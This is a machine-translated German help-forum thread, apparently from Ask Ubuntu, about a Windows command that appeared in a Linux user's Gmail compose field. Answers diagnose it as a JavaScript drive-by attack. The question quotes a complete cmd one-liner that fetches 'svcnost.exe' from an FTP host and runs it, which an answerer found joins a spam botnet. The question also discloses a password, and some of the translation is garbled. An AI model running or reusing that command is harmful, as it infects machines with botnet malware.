it-swarm.com.de

Wie kann ich feststellen, ob mein Linux-Computer gehackt wurde?

Mein Heim-PC ist normalerweise eingeschaltet, aber der Monitor ist ausgeschaltet. Heute Abend kam ich von der Arbeit nach Hause und fand einen Hackversuch: In meinem Browser war mein Google Mail-Konto geöffnet (das war ich), aber es befand sich im Kompositionsmodus mit den folgenden Angaben im Feld TO:

md/c echo open cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & Echo beenden Sie haben es in Besitz genommen

Das sieht für mich nach Windows-Befehlszeilencode aus, und der md-Start des Codes in Verbindung mit der Tatsache, dass Google Mail im Erstellungsmodus war, zeigt, dass jemand versucht hat, einen cmd-Befehl auszuführen. Ich schätze, ich hatte Glück, dass ich Windows nicht auf diesem PC ausführe, aber ich habe andere, die dies tun. Dies ist das erste Mal, dass mir so etwas passiert ist. Ich bin kein Linux-Guru und habe zu diesem Zeitpunkt außer Firefox keine anderen Programme ausgeführt.

Ich bin mir absolut sicher, dass ich das nicht geschrieben habe und niemand anderes physisch an meinem Computer war. Außerdem habe ich kürzlich mein Google-Passwort (und alle meine anderen Passwörter) in vMA8ogd7bv geändert, sodass ich nicht glaube, dass jemand mein Google-Konto gehackt hat.

Was ist gerade passiert? Wie setzt jemand Tastatureingaben auf meinen Computer, wenn nicht auf Omas altem Windows-Computer seit Jahren Malware ausgeführt wird, sondern eine neue Ubuntu-Installation?

Update:
Lassen Sie mich einige der Punkte und Fragen ansprechen:

  • Ich bin in Österreich, auf dem Land. Mein WLAN-Router läuft mit WPA2 / PSK und einer mittleren Stärke Passwort, das nicht im Wörterbuch enthalten ist; müsste brachial und weniger als 50 Meter von hier sein; Es ist unwahrscheinlich, dass es gehackt wurde.
  • Ich verwende eine USB-Tastatur, daher ist es sehr unwahrscheinlich, dass sich jemand in Reichweite befindet, um sie zu hacken.
  • Ich habe meinen Computer zu der Zeit nicht benutzt. es war nur zu Hause im Leerlauf, während ich bei der Arbeit war. Da es sich um einen am Monitor montierten Nettop-PC handelt, schalte ich ihn selten aus.
  • Die Maschine ist erst zwei Monate alt, läuft nur unter Ubuntu und ich benutze keine seltsame Software oder besuche seltsame Sites. Es geht hauptsächlich um Stack Exchange, Google Mail und Zeitungen. Keine Spiele. Ubuntu soll sich auf dem Laufenden halten.
  • Mir ist nicht bekannt, dass ein VNC-Dienst ausgeführt wird. Ich habe keinesfalls eines installiert oder aktiviert. Ich habe auch keine anderen Server gestartet. Ich bin mir nicht sicher, ob in Ubuntu standardmäßig welche ausgeführt werden?
  • Ich kenne alle IP-Adressen in der Kontoaktivität von Google Mail. Ich bin mir ziemlich sicher, dass Google kein Eingang war.
  • Ich habe einen Log File Viewer gefunden, weiß aber nicht, wonach ich suchen soll. Hilfe?

Was ich wirklich wissen möchte und was mich wirklich unsicher macht, ist: Wie kann jemand aus dem Internet Tastenanschläge auf meinem Computer erzeugen? Wie kann ich das verhindern, ohne mich darüber zu ärgern? Ich bin kein Linux-Freak, sondern ein Vater, der sich seit über 20 Jahren mit Windows herumschlägt und es satt hat. Und in all den über 18 Jahren, in denen ich online war, habe ich noch nie einen Hackversuch gesehen. Das ist also neu für mich.

128

Ich bezweifle, dass Sie sich Sorgen machen müssen. Es war mehr als wahrscheinlich, dass ein JavaScript-Angriff versuchte, ein Laufwerk per Download auszuführen. Wenn Sie Bedenken haben, starten Sie mit NoScript und AdBlock Plus Firefox Add-Ons.

Selbst wenn Sie vertrauenswürdige Websites besuchen, sind Sie nicht sicher, da dort JavaScript-Code von Drittanbietern ausgeführt wird, der böswillig sein kann.

Ich packte es und ließ es in einer VM laufen. Es hat mirc installiert und dies ist das Statusprotokoll ... http://Pastebin.com/Mn85akMk

Es ist ein automatisierter Angriff, der versucht, Sie dazu zu bringen, mIRC herunterzuladen und sich einem Botnetz anzuschließen, das Sie in einen Spambot verwandelt ... Mein VM hat sich angeschlossen und eine Verbindung zu einer Reihe verschiedener entfernter Adressen hergestellt Eines davon ist autoemail-119.west320.com.

Unter Windows 7 musste ich die UAC-Eingabeaufforderung akzeptieren und den Zugriff über die Firewall zulassen.

Es scheint Unmengen von Berichten über diesen genauen Befehl in anderen Foren zu geben, und jemand sagt sogar, dass eine Torrent-Datei versucht hat, ihn auszuführen, als der Download abgeschlossen war ... Ich bin mir jedoch nicht sicher, wie das möglich wäre.

Ich habe dies selbst nicht verwendet, aber es sollte Ihnen die aktuellen Netzwerkverbindungen anzeigen können, damit Sie sehen können, ob Sie mit etwas außerhalb der Norm verbunden sind: http: // netactview. sourceforge.net/download.html

66
Riguez

Ich stimme @ jb48394 zu, dass es wahrscheinlich ein JavaScript-Exploit ist, wie alles andere heutzutage.

Die Tatsache, dass versucht wurde, ein cmd-Fenster zu öffnen (siehe @ torbengbs Kommentar ) und einen böswilligen Befehl auszuführen, Anstatt den Trojaner nur diskret im Hintergrund herunterzuladen, wird vorgeschlagen, dass er eine Sicherheitsanfälligkeit in Firefox ausnutzt, die es ihm ermöglicht, Tastatureingaben vorzunehmen, aber keinen Code auszuführen.

Dies erklärt auch, warum dieser Exploit, der eindeutig exklusiv für Windows geschrieben wurde, auch unter Linux funktioniert: Firefox führt JavaScript in allen Betriebssystemen auf die gleiche Weise aus (zumindest versucht es :)) . Wenn es durch einen Pufferüberlauf oder einen ähnlichen für Windows bestimmten Exploit verursacht worden wäre, wäre das Programm nur abgestürzt.

Woher der JavaScript-Code stammt - wahrscheinlich eine böswillige Google-Anzeige (Anzeigen werden den ganzen Tag über in Google Mail geschaltet) . Es wäre nichtdasersteMal .

Ich fand einen ähnlichen Angriff auf einen anderen Linux-Rechner. Es scheint eine Art FTP-Befehl für Windows zu sein.

12
Shekhar

Dies beantwortet nicht Ihre ganze Frage, sondern sucht in der Protokolldatei nach fehlgeschlagenen Anmeldeversuchen.

Wenn Ihr Protokoll mehr als fünf fehlgeschlagene Versuche enthält, hat jemand versucht, root zu knacken. Wenn es einen erfolgreichen Anmeldeversuch bei root gibt, während Sie nicht an Ihrem Computer waren, ÄNDERN SIE IHR PASSWORT SOFORT !! Ich meine JETZT! Am liebsten etwas alphanumerisches und ca. 10 Zeichen lang.

Mit den erhaltenen Nachrichten (den Befehlen echo) klingt dies wirklich wie ein unreifes Skriptkind . Wenn es ein echter Hacker wäre, der weiß, was er tut, würden Sie wahrscheinlich immer noch nichts davon wissen.

5